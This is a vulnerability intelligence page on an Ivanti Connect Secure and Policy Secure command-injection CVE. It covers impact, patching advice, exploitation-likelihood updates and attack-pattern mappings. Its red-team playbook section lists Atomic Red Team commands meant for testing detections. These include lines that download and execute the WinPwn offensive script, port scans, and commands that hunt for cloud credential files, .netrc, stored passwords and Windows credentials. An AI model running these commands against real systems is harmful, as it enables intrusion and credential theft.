CVE-2024-11005
Overview
This vulnerability is a command injection flaw arising from improper input validation in the administrative interface of Ivanti Connect Secure and Ivanti Policy Secure. The root cause lies in the failure to sanitize user-supplied input within specific command execution components, allowing crafted input to be interpreted as system commands. The affected components are the administrative command processing modules in versions prior to 22.7R2.1 for Connect Secure and 22.7R1.1 for Policy Secure, excluding 9.1Rx releases.
Vulnerability Description
Command injection in Ivanti Connect Secure before version 22.7R2.1 (Not Applicable to 9.1Rx) and Ivanti Policy Secure before version 22.7R1.1 (Not Applicable to 9.1Rx) allows a remote authenticated attacker with admin privileges to achieve remote code execution.
Impact
An attacker with valid administrative credentials can exploit this vulnerability to execute arbitrary system commands remotely, gaining full control over the affected system. This enables unauthorized manipulation or disruption of services, data exfiltration, or lateral movement within the network. The attack requires network access and high-privilege authentication (PR:H), with no user interaction needed (UI:N). The CVSS vector indicates high confidentiality, integrity, and availability impact (C:H/I:H/A:H).
Solution
Ivanti has released security updates addressing this issue in Ivanti Connect Secure version 22.7R2.1 and Ivanti Policy Secure version 22.7R1.1. Administrators should apply these patches immediately to affected systems. Detailed patch instructions and advisory information are available at the Ivanti Security Advisory portal: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-ICS-Ivanti-Policy-Secure-IPS-Ivanti-Secure-Access-Client-ISAC-Multiple-CVEs. No workarounds are documented; patching is the recommended remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in Ivanti Connect Secure and Ivanti Policy Secure arises from a command injection flaw that allows remote authenticated attackers with administrative privileges to execute arbitrary code on the affected systems. This type of vulnerability occurs when an application improperly sanitizes user input, enabling attackers to manipulate commands executed by the system. In this case, the flaw exists in versions prior to 22.7R2.1 for Connect Secure and 22.7R1.1 for Policy Secure, leaving systems running these versions susceptible to exploitation. The potential for remote code execution significantly heightens the risk, as it allows attackers to gain control over the affected devices, potentially leading to further compromise of the network.
Attack vectors for this vulnerability primarily involve authenticated users leveraging their administrative access to inject malicious commands. An attacker could exploit this vulnerability through various means, such as crafting specially designed requests that include the malicious payload. Once executed, the attacker could manipulate the system to perform unauthorized actions, such as accessing sensitive data, altering configurations, or deploying additional malware. Given that the vulnerability is limited to authenticated users with admin privileges, the risk is particularly pronounced in environments where administrative access is not tightly controlled or monitored.
The real-world impact of this vulnerability can be severe, especially for organizations that rely on Ivanti's products for secure remote access and policy enforcement. Successful exploitation could lead to unauthorized access to sensitive corporate data, disruption of services, and potential compliance violations, particularly in regulated industries. The business risks associated with such an incident include financial losses, reputational damage, and legal repercussions stemming from data breaches. Moreover, the ability to execute arbitrary code remotely could allow attackers to pivot within the network, escalating their access and potentially compromising additional systems.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is crucial to ensure that all systems are updated to the latest versions that have addressed this flaw. Regular patch management practices should be established to minimize the window of exposure to known vulnerabilities. Additionally, organizations should conduct thorough security assessments and penetration testing to identify and remediate any potential weaknesses in their systems. Monitoring for unusual activity, especially from accounts with administrative privileges, can help detect exploitation attempts early. Employing web application firewalls and intrusion detection systems can further bolster defenses by filtering out malicious requests before they reach the vulnerable application.
In conclusion, the command injection vulnerability in Ivanti Connect Secure and Policy Secure presents a significant threat to organizations that utilize these products. The potential for remote code execution by authenticated attackers underscores the importance of maintaining robust security practices, including timely updates, access controls, and continuous monitoring. By adopting a proactive approach to vulnerability management, organizations can mitigate the risks associated with this and similar vulnerabilities, thereby safeguarding their critical assets and maintaining the integrity of their operations.
CSURFACE threat intelligence has identified a moderate increase in the Exploit Prediction Scoring System (EPSS) for CVE-2024-11005, reflecting a rising likelihood of exploitation despite stable short-term trends. This upward adjustment in EPSS suggests growing attacker interest or improved exploitability conditions, even though no new exploit techniques or proof-of-concept code have been publicly disclosed. For defenders, this signals a heightened risk environment where the window for potential compromise may be narrowing, particularly given the vulnerability’s requirement for authenticated administrative access. The increase in EPSS, now placing this vulnerability near the top percentile of predicted exploitation risk, underscores the critical need for vigilant monitoring of Ivanti Connect Secure deployments. While the threat landscape remains without fresh exploit intelligence, the quantitative shift in predictive scoring warrants recalibrated risk assessments, elevating the urgency for organizations to reassess their exposure and prioritize defensive postures accordingly.
Update 2 — July 12, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-11005, with our telemetry indicating the first confirmed sighting of exploitation attempts targeting this vulnerability. Although the overall exploit landscape remains static with no new publicly disclosed exploit techniques, this initial detection signals a shift from theoretical risk to active reconnaissance or exploitation in the wild. The presence of authenticated administrative access as a prerequisite continues to limit the attack surface, but the observed activity suggests adversaries are increasingly probing Ivanti Connect Secure environments for potential entry points. This development elevates the threat level from a primarily latent concern to one requiring heightened vigilance, as the vulnerability’s exploitation potential is now substantiated by real-world attempts. Consequently, defenders should recognize this as a critical inflection point in the vulnerability’s lifecycle, reflecting a transition toward active targeting that may presage more aggressive exploitation efforts.
Affected Products (13)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Connect Secure | All |
cpe:2.3:a:ivanti:connect_secure:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | All |
cpe:2.3:a:ivanti:connect_secure:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:-:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1.2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1.3:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1.4:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1.5:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r2:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | All |
cpe:2.3:a:ivanti:policy_secure:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | All |
cpe:2.3:a:ivanti:policy_secure:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 22.7 |
cpe:2.3:a:ivanti:policy_secure:22.7:r1:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
1 eventsSighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
47%
|
High | High | |
| CAPEC-6 | Argument Injection |
46%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-11005 |
| forums.ivanti.com |
GitHub CVE
|
https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-ICS-Ivanti-Policy-Secure-IPS-Ivanti-Secure-Access-Client-ISAC-Multiple-CVEs |